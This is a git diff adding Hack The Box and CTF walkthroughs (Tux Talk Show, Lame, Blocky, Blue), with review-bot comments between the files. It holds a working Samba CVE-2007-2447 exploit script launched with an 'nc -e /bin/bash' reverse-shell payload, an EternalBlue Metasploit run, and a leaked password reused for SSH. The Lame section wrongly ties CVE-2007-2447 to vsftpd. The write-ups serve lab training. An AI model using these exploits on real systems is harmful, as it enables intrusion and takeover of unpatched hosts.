+ /* try { // try from 00101419 to 00101448 has its CatchHandler @ 0010147f */
+ std::operator>>(local_228,local_248);
+ pbVar3 = std::operator<<((basic_ostream *)std::cout,local_248);
+ std::basic_ostream>::operator<<
+ ((basic_ostream> *)pbVar3,
+ std::endl>);
+ std::__cxx11::basic_string,std::allocator>::~basic_string
+ ((basic_string,std::allocator> *)local_248);
+ }
+ std::basic_ifstream>::~basic_ifstream
+ ((basic_ifstream> *)local_228);
+ if (local_20 != *(long *)(in_FS_OFFSET + 0x28)) {
+ /* WARNING: Subroutine does not return */
+ __stack_chk_fail();
+ }
+ return 0;
+ }
+
+
+Here we cansee that it starts off by scanning the contents of flag.txt and saves it into **local_228**. Then it initialized an integer array with size entries, although the decompilation only shows 4. So let's look at the assembly code:
+
+
+ 001012bc e8 8f fd CALL operator>> undefined operator>>(basic_istre
+ ff ff
+ } // end try from 0010127e to 001012c0
+ 001012c1 c7 85 88 MOV dword ptr [RBP + local_280],0x79
+ fd ff ff
+ 79 00 00 00
+ 001012cb c7 85 8c MOV dword ptr [RBP + local_27c],0x12c97f
+ fd ff ff
+ 7f c9 12 00
+ 001012d5 c7 85 90 MOV dword ptr [RBP + local_278],0x135f0f8
+ fd ff ff
+ f8 f0 35 01
+ 001012df c7 85 94 MOV dword ptr [RBP + local_274],0x74acbc6
+ fd ff ff
+ c6 cb 4a 07
+ 001012e9 c7 85 98 MOV dword ptr [RBP + local_270],0x56c614e
+ fd ff ff
+ 4e 61 6c 05
+ 001012f3 c7 85 9c MOV dword ptr [RBP + local_26c],0xffffffe2
+ fd ff ff
+ e2 ff ff ff
+
+
+
+We also see that it uses time as a seed. It performs an algorithm where it will generate random numbers by using time a sa seed to edit the values of array, and then it accumulate all of those values to end up with the number we are supposed to guess. Since the rand function is directly based off of the seed, and since the seed is the time, we know what the values the rand function will output, and thus end up with the following C program:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → vim exploit.c
+
+
+
+
+ ****#include <****stdio.h>
+ #include <****stdlib.h>
+ #include <****stdint.h>
+ #include <****time.h>
+
+ int main()
+ {
+ int array[6];
+ int i, output;
+ uint32_t randVal, ans;
+
+ srand(time(0));
+
+
+ i = 0;
+
+ array[0] = 0x79;
+ array[1] = 0x12c97f;
+ array[2] = 0x135f0f8;
+ array[3] = 0x74acbc6;
+ array[4] = 0x56c614e;
+ array[5] = 0xffffffe2;
+
+ while (i < 6)
+ {
+ randVal = rand();
+ array[i] = array[i] - ((randVal % 10) - 1);
+ i += 1;
+ }
+
+ i = 0;
+ output = 0;
+
+ while (i < 6)
+ {
+ output = output + array[i];
+ i += 1;
+ }
+
+
+ printf("%d\n", output);
+ }
+
+
+Then we compile our C code:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → gcc exploit.c -o exploit
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+
+
+
+let's try it on the binary file:
+
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874834
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874839
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit
+ 234874828
+
+ [ 192.168.0.18/24 ] [ /dev/pts/25 ] [binexp/3/tux]
+ → ./exploit | ./tuxtalkshow
+ Welcome to Tux Talk Show 2019!!!
+ Enter your lucky number: flag{g0tt3m_boyz}
+
+
+
+And that's it ! We have been able to print out the flag.
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
+## Title
+
+text
+
+
+
+
+` ![]()
+
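Review bot: the `#include` lines of exploit.c in this hunk are garbled by leaked bold markup (`****#include <****stdio.h>` and the three lines after it) and will not compile as pasted; they should read `#include <stdio.h>`, `#include <stdlib.h>`, `#include <stdint.h>`, `#include <time.h>`, and `ans` is declared but never used. The prose above the listing has two factual slips: `local_228` is the `basic_ifstream` (it is torn down by `~basic_ifstream((basic_ifstream> *)local_228)`), and the flag string is read into `local_248` by `std::operator>>(local_228,local_248)`, so "saves it into local_228" should be local_248; and "initialized an integer array with size entries, although the decompilation only shows 4" carries a placeholder word ("size") and the wrong count, since the assembly that follows stores six dwords (`local_280` through `local_26c`). The caveat a reader needs is also missing: the prediction works only because both processes call `srand(time(0))` within the same second, which the three standalone runs (234874834, 234874839, 234874828) illustrate, so `./exploit | ./tuxtalkshow` succeeds because the pipe starts both at once; say so. Typos: "cansee", "time a sa seed", "it accumulate". Finally, the two unfilled `## Title` / `text` / `` ` ![]() `` scaffolds at the end of the file (with a stray backtick before the empty image link) are template residue and should be filled in or dropped before merge.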
diff --git a/Easy/0.md b/Easy/0.md
new file mode 100644
index 0000000..4d1202b
--- /dev/null
+++ b/Easy/0.md
@@ -0,0 +1,145 @@
+# BOXNAME Writeup
+
+
+
+## Introduction :
+
+Boxname is an easy box released back in MONTH YEAR.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+
+
+## **Part 2 : Getting User Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Part 3 : Getting Root Access**
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
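Review bot: Easy/0.md is an unfilled template (`# BOXNAME Writeup`, "released back in MONTH YEAR", and roughly 120 empty lines between the Part headings) committed under a numbered name next to finished writeups, so it will render as an empty entry in the Easy series. Either leave it out of this commit or move it to a clearly named template file, and note that its Conclusion section refers to a "progress graph" with no image behind it.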
diff --git a/Easy/1.md b/Easy/1.md
new file mode 100644
index 0000000..dd1f5a8
--- /dev/null
+++ b/Easy/1.md
@@ -0,0 +1,211 @@
+# Lame Writeup
+
+
+
+## Introduction :
+
+**Lame** is an easy Linux box which was released back in March 2017. It features a common vulnerability which could be exploited using a metasploit module.
+
+## **Requirerements :**
+
+ * [Linux commands](../../CS/LTerm.html)
+ * [Nmap](../../CS/nmap.html)
+ * [Searchsploit](../../CS/searchsploit.html)
+ * [Python](../../CS/python.html)
+ * [Netcat](../../CS/netcat.html)
+
+
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ root [/home/nihilist] → nmap -sC -sV 10.10.10.3
+ Starting Nmap 7.70 ( https://nmap.org ) at 2019-06-11 10:55 EDT
+ Nmap scan report for 10.10.10.3
+ Host is up (0.27s latency).
+ Not shown: 996 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp vsftpd 2.3.4
+ |_ftp-anon: Anonymous FTP login allowed (FTP code 230)
+ | ftp-syst:
+ | STAT:
+ | FTP server status:
+ | Connected to 10.10.14.6
+ | Logged in as ftp
+ | TYPE: ASCII
+ | No session bandwidth limit
+ | Session timeout in seconds is 300
+ | Control connection is plain text
+ | Data connections will be plain text
+ | vsFTPd 2.3.4 - secure, fast, stable
+ |_End of status
+ 22/tcp open ssh OpenSSH 4.7p1 Debian 8ubuntu1 (protocol 2.0)
+ | ssh-hostkey:
+ | 1024 60:0f:cf:e1:c0:5f:6a:74:d6:90:24:fa:c4:d5:6c:cd (DSA)
+ |_ 2048 56:56:24:0f:21:1d:de:a7:2b:ae:61:b1:24:3d:e8:f3 (RSA)
+ 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
+ 445/tcp open netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Host script results:
+ |_clock-skew: mean: 3h44m23s, deviation: 0s, median: 3h44m23s
+ | smb-os-discovery:
+ | OS: Unix (Samba 3.0.20-Debian)
+ | NetBIOS computer name:
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-06-11T10:39:56-04:00
+ |_smb2-time: Protocol negotiation failed (SMB2)
+ Service detection performed.
+
+ Nmap done: 1 IP address (1 host up) scanned in 98.43 seconds
+
+
+Here we can see that the ports 21, 22, 139 and 445 are opened The port 21 is running an outdated version of vsftpd (here: v2.3.4 current:v3.0.3), this is going to be our main focus for the next part.
+
+## **Part 2 : Getting User Access**
+
+We know that port 21 is running vsftpd 2.3.4, let's see if there are exploits we can use using the **searchsploit** command:
+
+
+ λ nihilist [~] → searchsploit vsftpd 2.3.4
+ ------------------------------------------------------ ------------------------------
+ Exploit Title | Path
+ | (/usr/share/exploitdb/)
+ ------------------------------------------------------ ------------------------------
+ vsftpd 2.3.4 - Backdoor Command Execution (Metasploit)| exploits/unix/remote/17491.rb
+ ------------------------------------------------------ ------------------------------
+ Shellcodes: No Result
+
+
+We could use the metasploit module exploiting the present CVE-2007-2447 But we can also use the following [python script](https://github.com/Jack-Barradell/exploits/blob/master/CVE-2007-2447/cve-2007-2447.py) in order to exploit our target machine.
+
+
+ # CVE-2007-2447 - RCE in Samba
+
+ import getopt
+ import sys
+ from smb import SMBConnection
+
+
+ def usage():
+ print('CVE-2007-2447 - RCE In Samba 2.0.20 < 3.0.25rc3')
+ print()
+ print('Flags:')
+ print('{} - Target Host'.format('\t-t --target'.ljust(20,' ')))
+ print('{} - Target Port'.format('\t-p --port'.ljust(20,' ')))
+ print('{} - Command to execute'.format('\t-c --cmd'.ljust(20,' ')))
+ print()
+
+
+ def main():
+ try:
+ opts,args = getopt.getopt(sys.argv[1:],'t:p:c:',['target','port','cmd'])
+ except getopt.GetoptError as e:
+ print(str(e))
+ usage()
+ sys.exit(1)
+ target = None
+ port = None
+ cmd = None
+ for o,a in opts:
+ if o in ('-t','--target'):
+ target = a
+ elif o in ('-p','--port'):
+ try:
+ port = int(a)
+ except ValueError:
+ print('[!] Invalid port provided, must be an int')
+ usage()
+ sys.exit(1)
+ elif o in ('-c','--cmd'):
+ cmd = a
+ else:
+ print('[!] Invalid option {} with value: {}'.format(o,a))
+ usage()
+ sys.exit(1)
+
+ missing_param = False
+
+ if target is None:
+ print('[!] Must provide target')
+ missing_param = True
+
+ if port is None:
+ print('[!] Must provide port')
+ missing_param = True
+
+ if cmd is None:
+ print('[!] Must provide command')
+ missing_param = True
+
+ if missing_param:
+ usage()
+ sys.exit(1)
+
+ print('[+] Generating exploit')
+ exploit = '/=`nohup {}`'.format(cmd)
+
+ c = SMBConnection.SMBConnection(exploit, '', '', '')
+
+ try:
+ c.connect(target, port, timeout=1)
+ except:
+ print('[+] Exploit sent')
+
+
+ if __name__ == '__main__':
+ main()
+
+
+With which we are now able to run using the following commands within 2 separate terminals :
+
+_Terminal n°1 :_
+
+
+ λ nihilist [~] → nc -lvnp 4444
+
+
+_Terminal n°2 :_
+
+
+ λ nihilist [~] → python3 cve-2007-2447.py -t 10.10.10.3 -p 445 -c "nc -e /bin/bash 10.10.14.10 4444"
+ [+] Generating exploit
+ [+] Exploit sent
+
+
+Which gives us access to the machine. Through a reverse shell back to our local address **10.10.14.10** at the listening **4444** port. within our first Terminal.
+
+_Terminal n°1 :_
+
+
+ λ nihilist [~] → nc -lvnp 4444
+ connect to [10.10.14.10] from (UNKNOWN) [10.10.10.3] 43358
+ # id
+ uid=0(root) gid=0(root)
+
+
+We now have not only user access, but also an Elevated-privilege Reverse Shell which is going to allow us to read both the user and root flags.
+
+## **Part 3 : The Root Access**
+
+All we need to do is print out both the user flag and root flag since we are now logged on as root.
+
+
+ # id
+ uid=0(root) gid=0(root)
+
+ #cat /home/makis/user.txt
+ [REDACTED]
+
+ #cat /root/root.txt
+ [REDACTED]
+
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
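Review bot: the foothold narrative in this hunk contradicts the exploit it actually runs. Part 1 and the `searchsploit vsftpd 2.3.4` step point at the vsftpd backdoor (`exploits/unix/remote/17491.rb`), but the script that follows is headed `# CVE-2007-2447 - RCE in Samba`, builds the username ``/=`nohup {}` `` for the Samba "username map script" bug, and is launched with `-p 445`; the vsftpd backdoor is never used, and CVE-2007-2447 is not a vsftpd issue, so "the metasploit module exploiting the present CVE-2007-2447" is wrong as written. Rewrite Part 1/Part 2 so the target is Samba 3.0.20-Debian on 445 (which nmap reported), or keep the vsftpd detour and say it was abandoned. Two points on the quoted script: the long options are declared without `=` (`['target','port','cmd']`), so `--target 10.10.10.3` would not take its argument as the usage text promises (`['target=','port=','cmd=']` fixes it), and the bare `except:` prints `[+] Exploit sent` on any error, including connection refused, so that line is not evidence the payload ran; the listener output is. Also, the attacker address is 10.10.14.6 in the ftp-syst output but 10.10.14.10 in the `nc -e` command, so if these are different sessions say so; "Requirerements" is misspelled; and the Part 3 heading ("The Root Access") differs from the "Getting Root Access" used elsewhere.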
diff --git a/Easy/10.md b/Easy/10.md
new file mode 100644
index 0000000..f8ebf9a
--- /dev/null
+++ b/Easy/10.md
@@ -0,0 +1,292 @@
+# Blocky Writeup
+
+
+
+## Introduction :
+
+Blocky was an easy Linux Box that was released back in July 2017.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.37
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-14 10:54 CET
+ Nmap scan report for 10.10.10.37
+ Host is up (0.085s latency).
+ Not shown: 996 filtered ports
+ PORT STATE SERVICE VERSION
+ 21/tcp open ftp ProFTPD 1.3.5a
+ 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
+ | ssh-hostkey:
+ | 2048 d6:2b:99:b4:d5:e7:53:ce:2b:fc:b5:d7:9d:79:fb:a2 (RSA)
+ | 256 5d:7f:38:95:70:c9:be:ac:67:a0:1e:86:e7:97:84:03 (ECDSA)
+ |_ 256 09:d5:c2:04:95:1a:90:ef:87:56:25:97:df:83:70:67 (ED25519)
+ 80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
+ |_http-generator: WordPress 4.8
+ |_http-server-header: Apache/2.4.18 (Ubuntu)
+ |_http-title: BlockyCraft - Under Construction!
+ 8192/tcp closed sophos
+ Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 19.32 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Looking at the results, we see that port 80 is serving the http service, with wordpress. We can therefore use the wordpress scanning command called **wpscan**.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → wpscan --url 10.10.10.37 --enumerate
+ _______________________________________________________________
+ __ _______ _____
+ \ \ / / __ \ / ____|
+ \ \ /\ / /| |__) | (___ ___ __ _ _ __ ®
+ \ \/ \/ / | ___/ \___ \ / __|/ _ | _ \
+ \ /\ / | | ____) | (__| (_| | | | |
+ \/ \/ |_| |_____/ \___|\__,_|_| |_|
+
+ WordPress Security Scanner by the WPScan Team
+ Version 3.7.4
+
+ @_WPScan_, @ethicalhack3r, @erwan_lr, @_FireFart_
+ _______________________________________________________________
+
+ [i] Updating the Database ...
+ [i] Update completed.
+
+ [+] URL: http://10.10.10.37/
+ [+] Started: Thu Nov 14 11:04:57 2019
+
+ Interesting Finding(s):
+
+ [+] http://10.10.10.37/
+ | Interesting Entry: Server: Apache/2.4.18 (Ubuntu)
+ | Found By: Headers (Passive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.37/xmlrpc.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+ | References:
+ | - http://codex.wordpress.org/XML-RPC_Pingback_API
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_ghost_scanner
+ | - https://www.rapid7.com/db/modules/auxiliary/dos/http/wordpress_xmlrpc_dos
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_xmlrpc_login
+ | - https://www.rapid7.com/db/modules/auxiliary/scanner/http/wordpress_pingback_access
+
+ [+] http://10.10.10.37/readme.html
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] Upload directory has listing enabled: http://10.10.10.37/wp-content/uploads/
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 100%
+
+ [+] http://10.10.10.37/wp-cron.php
+ | Found By: Direct Access (Aggressive Detection)
+ | Confidence: 60%
+ | References:
+ | - https://www.iplocation.net/defend-wordpress-from-ddos
+ | - https://github.com/wpscanteam/wpscan/issues/1299
+
+ [+] WordPress version 4.8 identified (Insecure, released on 2017-06-08).
+ | Found By: Rss Generator (Passive Detection)
+ | - http://10.10.10.37/index.php/feed/, https://wordpress.org/?v=4.8
+ | - http://10.10.10.37/index.php/comments/feed/, https://wordpress.org/?v=4.8
+
+ [+] WordPress theme in use: twentyseventeen
+ | Location: http://10.10.10.37/wp-content/themes/twentyseventeen/
+ | Last Updated: 2019-05-07T00:00:00.000Z
+ | Readme: http://10.10.10.37/wp-content/themes/twentyseventeen/README.txt
+ | [!] The version is out of date, the latest version is 2.2
+ | Style URL: http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8
+ | Style Name: Twenty Seventeen
+ | Style URI: https://wordpress.org/themes/twentyseventeen/
+ | Description: Twenty Seventeen brings your site to life with header video and immersive featured images. With a fo...
+ | Author: the WordPress team
+ | Author URI: https://wordpress.org/
+ |
+ | Found By: Css Style In Homepage (Passive Detection)
+ |
+ | Version: 1.3 (80% confidence)
+ | Found By: Style (Passive Detection)
+ | - http://10.10.10.37/wp-content/themes/twentyseventeen/style.css?ver=4.8, Match: 'Version: 1.3'
+
+ [+] Enumerating Vulnerable Plugins (via Passive Methods)
+
+ [i] No plugins Found.
+
+ [+] Enumerating Vulnerable Themes (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:07 <====================================> (316 / 316) 100.00% Time: 00:00:07
+ [+] Checking Theme Versions (via Passive and Aggressive Methods)
+
+ [i] No themes Found.
+
+ [+] Enumerating Timthumbs (via Passive and Aggressive Methods)
+ Checking Known Locations - Time: 00:00:53 <==================================> (2575 / 2575) 100.00% Time: 00:00:53
+
+ [i] No Timthumbs Found.
+
+ [+] Enumerating Config Backups (via Passive and Aggressive Methods)
+ Checking Config Backups - Time: 00:00:00 <=======================================> (21 / 21) 100.00% Time: 00:00:00
+
+ [i] No Config Backups Found.
+
+ [+] Enumerating DB Exports (via Passive and Aggressive Methods)
+ Checking DB Exports - Time: 00:00:00 <===========================================> (36 / 36) 100.00% Time: 00:00:00
+
+ [i] No DB Exports Found.
+
+ [+] Enumerating Medias (via Passive and Aggressive Methods) (Permalink setting must be set to "Plain" for those to be detected)
+ Brute Forcing Attachment IDs - Time: 00:00:03 <================================> (100 / 100) 100.00% Time: 00:00:03
+
+ [i] No Medias Found.
+
+ [+] Enumerating Users (via Passive and Aggressive Methods)
+ Brute Forcing Author IDs - Time: 00:00:00 <======================================> (10 / 10) 100.00% Time: 00:00:00
+
+ [i] User(s) Identified:
+
+ [+] notch
+ | Found By: Author Posts - Author Pattern (Passive Detection)
+ | Confirmed By:
+ | Wp Json Api (Aggressive Detection)
+ | - http://10.10.10.37/index.php/wp-json/wp/v2/users/?per_page=100&page;=1
+ | Author Id Brute Forcing - Author Pattern (Aggressive Detection)
+ | Login Error Messages (Aggressive Detection)
+
+ [+] Notch
+ | Found By: Rss Generator (Passive Detection)
+ | Confirmed By: Login Error Messages (Aggressive Detection)
+
+ [!] No WPVulnDB API Token given, as a result vulnerability data has not been output.
+ [!] You can get a free API token with 50 daily requests by registering at https://wpvulndb.com/users/sign_up.
+
+ [+] Finished: Thu Nov 14 11:06:14 2019
+ [+] Requests Done: 3119
+ [+] Cached Requests: 10
+ [+] Data Sent: 768.632 KB
+ [+] Data Received: 14.199 MB
+ [+] Memory used: 224.906 MB
+ [+] Elapsed time: 00:01:17
+
+
+We see that we have an username to work with, named **notch** We will now run the gobuster command to see if we are able to enumerate interesting directories.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → gobuster -e -u 10.10.10.37 -w wordlist.txt
+
+
+Looking at the results we see that gobuster found the directory named **/plugins** We now browse to the folder gobuster found to see what we can enumerate there.
+
+
+
+We will now download the files that are available for us here, in order to examine them First of all we'll open up the BlockyCore.jar using an archive explorer and then extract the blockycore.class located inside /com/myfirstplugin/
+
+Once the .class file is extracted all we need to do to print out it's contents is to use the **jad** command.
+
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Blocky] → jad BlockyCore.class
+ Parsing BlockyCore.class...The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)
+ Generating BlockyCore.jad
+
+ λ root [ 10.10.14.48/23 ] [nihilist/_HTB/Blocky] → cat BlockyCore.jad
+ // Decompiled by Jad v1.5.8e. Copyright 2001 Pavel Kouznetsov.
+ // Jad home page: http://www.geocities.com/kpdus/jad.html
+ // Decompiler options: packimports(3)
+ // Source File Name: BlockyCore.java
+
+ package com.myfirstplugin;
+
+
+ public class BlockyCore
+ {
+
+ public BlockyCore()
+ {
+ sqlHost = "localhost";
+ sqlUser = "root";
+ sqlPass = "8YsqfCTnvxAUeduzjNSXe22";
+ }
+
+ public void onServerStart()
+ {
+ }
+
+ public void onServerStop()
+ {
+ }
+
+ public void onPlayerJoin()
+ {
+ sendMessage("TODO get username", "Welcome to the BlockyCraft!!!!!!!");
+ }
+
+ public void sendMessage(String s, String s1)
+ {
+ }
+
+ public String sqlHost;
+ public String sqlUser;
+ public String sqlPass;
+ }
+
+
+We now have credentials to work with : **notch : 8YsqfCTnvxAUeduzjNSXe22** Our previous nmap scan returned that 22 ssh port is opened.
+
+## **Part 3 : Getting Root Access**
+
+We should be able to ssh into the machine with the aforementionned credentials.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → ssh notch@10.10.10.37
+ notch@10.10.10.37 password:
+ Welcome to Ubuntu 16.04.2 LTS (GNU/Linux 4.4.0-62-generic x86_64)
+
+ * Documentation: https://help.ubuntu.com
+ * Management: https://landscape.canonical.com
+ * Support: https://ubuntu.com/advantage
+
+ 7 packages can be updated.
+ 7 updates are security updates.
+
+
+ Last login: Sun Dec 24 09:34:35 2017
+ notch@Blocky:~$ whoami
+ notch
+ notch@Blocky:~$ uname -a
+ Linux Blocky 4.4.0-62-generic #83-Ubuntu SMP Wed Jan 18 14:10:15 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
+ notch@Blocky:~$ cat /home/notch/user.txt
+ 59XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+We have been able to get our user flag ! now we just need to escalate privileges, typing sudo -l shows us that we are able to type the command **sudo su** to spawn a root shell.
+
+
+ notch@Blocky:~$ sudo -l
+ [sudo] password for notch:
+ Matching Defaults entries for notch on Blocky:
+ env_reset, mail_badpass,
+ secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
+
+ User notch may run the following commands on Blocky:
+ (ALL : ALL) ALL
+ notch@Blocky:~$ cat /root/root.txt
+ cat: /root/root.txt: Permission denied
+ notch@Blocky:~$ sudo su
+ root@Blocky:/home/notch# cat /root/root.txt
+ 0aXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
+
+
+And that's it ! We have been able to print the root flag thanks to a simple sudo -l command.
+
+## **Conclusion**
+
+Here we can see the progress graph :
+
+
+
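Review bot: the credential step in this hunk skips the reasoning that is the actual finding. The decompiled `BlockyCore` hardcodes `sqlUser = "root"` and `sqlPass = "8YsqfCTnvxAUeduzjNSXe22"`, i.e. a MySQL root password shipped inside a jar under a publicly listed `/plugins` directory; the line "We now have credentials to work with : notch : 8YsqfCTnvxAUeduzjNSXe22" should say that `notch` is the WordPress author wpscan enumerated and that logging into SSH with the database password is a password-reuse guess that happens to work. Two gaps in the evidence: the gobuster command uses an unnamed `wordlist.txt` and its output is omitted, yet the next sentence says "gobuster found the directory named /plugins", so include the matching output line or the wordlist path; and `jad` prints "The class file version is 52.0 (only 45.3, 46.0 and 47.0 are supported)", so it is worth stating that the output was still usable here but a decompiler that supports Java 8 class files is the safer choice. The wpscan output also carries an entity artifact, `?per_page=100&page;=1`, which should be `&page=1`. Typos: "an username", "aforementionned", "it's contents".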
diff --git a/Easy/11.md b/Easy/11.md
new file mode 100644
index 0000000..260bea8
--- /dev/null
+++ b/Easy/11.md
@@ -0,0 +1,165 @@
+# Blue Writeup
+
+
+
+## Introduction :
+
+Blue was an easy Windows box released back in July 2017. It features a vulnerability onto which the well-known exploit "EternalBlue" can be used.
+
+## **Part 1 : Initial Enumeration**
+
+As always we begin our Enumeration using **Nmap** to enumerate opened ports. We will be using the flags **-sC** for default scripts and **-sV** to enumerate versions.
+
+
+ λ nihilist [ 10.10.14.48/23 ] [~] → nmap -sC -sV 10.10.10.40
+ Starting Nmap 7.80 ( https://nmap.org ) at 2019-11-15 21:24 CET
+ Nmap scan report for 10.10.10.40
+ Host is up (0.083s latency).
+ Not shown: 991 closed ports
+ PORT STATE SERVICE VERSION
+ 135/tcp open msrpc Microsoft Windows RPC
+ 139/tcp open netbios-ssn Microsoft Windows netbios-ssn
+ 445/tcp open microsoft-ds Windows 7 Professional 7601 Service Pack 1 microsoft-ds (workgroup: WORKGROUP)
+ 49152/tcp open msrpc Microsoft Windows RPC
+ 49153/tcp open msrpc Microsoft Windows RPC
+ 49154/tcp open msrpc Microsoft Windows RPC
+ 49155/tcp open msrpc Microsoft Windows RPC
+ 49156/tcp open msrpc Microsoft Windows RPC
+ 49157/tcp open msrpc Microsoft Windows RPC
+ Service Info: Host: HARIS-PC; OS: Windows; CPE: cpe:/o:microsoft:windows
+
+ Host script results:
+ |_clock-skew: mean: 2m15s, deviation: 2s, median: 2m14s
+ | smb-os-discovery:
+ | OS: Windows 7 Professional 7601 Service Pack 1 (Windows 7 Professional 6.1)
+ | OS CPE: cpe:/o:microsoft:windows_7::sp1:professional
+ | Computer name: haris-PC
+ | NetBIOS computer name: HARIS-PC\x00
+ | Workgroup: WORKGROUP\x00
+ |_ System time: 2019-11-15T20:28:09+00:00
+ | smb-security-mode:
+ | account_used: guest
+ | authentication_level: user
+ | challenge_response: supported
+ |_ message_signing: disabled (dangerous, but default)
+ | smb2-security-mode:
+ | 2.02:
+ |_ Message signing enabled but not required
+ | smb2-time:
+ | date: 2019-11-15T20:28:07
+ |_ start_date: 2019-11-15T14:45:46
+
+ Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
+ Nmap done: 1 IP address (1 host up) scanned in 76.50 seconds
+
+
+
+## **Part 2 : Getting User Access**
+
+Our nmap scan result picked up a combination of smb and Windows 7 SP1 7601 , this may ring a bell with the leaked NSA tool called "EternalBlue", which takes advantage of the vulnerability affecting SMBv1 which is now known to mishandle special packets from attackers, this CVE has been fixed with the MS17-010 patch. Let's see if it works on this box.
+
+
+ msf5 > search eternalblue
+
+ Matching Modules
+ ================
+
+ # Name Disclosure Date Rank Check Description
+ - ---- --------------- ---- ----- -----------
+ 0 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
+ 1 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
+ 2 exploit/windows/smb/doublepulsar_rce 2017-04-14 great Yes DOUBLEPULSAR Payload Execution and Neutralization
+ 3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average Yes MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
+ 4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
+ 5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
+
+
+
+
+
+ msf5 > use exploit/windows/smb/ms17_010_eternalblue
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > show options
+
+ Module options (exploit/windows/smb/ms17_010_eternalblue):
+
+ Name Current Setting Required Description
+ ---- --------------- -------- -----------
+ RHOSTS yes The target host(s), range CIDR identifier, or hosts file with syntax 'file:'
+ RPORT 445 yes The target port (TCP)
+ SMBDomain . no (Optional) The Windows domain to use for authentication
+ SMBPass no (Optional) The password for the specified username
+ SMBUser no (Optional) The username to authenticate as
+ VERIFY_ARCH true yes Check if remote architecture matches exploit Target.
+ VERIFY_TARGET true yes Check if remote OS matches exploit Target.
+
+
+ Exploit target:
+
+ Id Name
+ -- ----
+ 0 Windows 7 and Server 2008 R2 (x64) All Service Packs
+
+
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
+ RHOSTS => 10.10.10.40
+
+
+
+## **Part 3 : The Root Access**
+
+Let's see if we can exploit this machine using the EternalBlue metasploit module.
+
+
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > set RHOSTS 10.10.10.40
+ RHOSTS => 10.10.10.40
+ msf5 exploit(windows/smb/ms17_010_eternalblue) > exploit
+
+ [*] Started reverse TCP handler on 10.10.14.48:4444
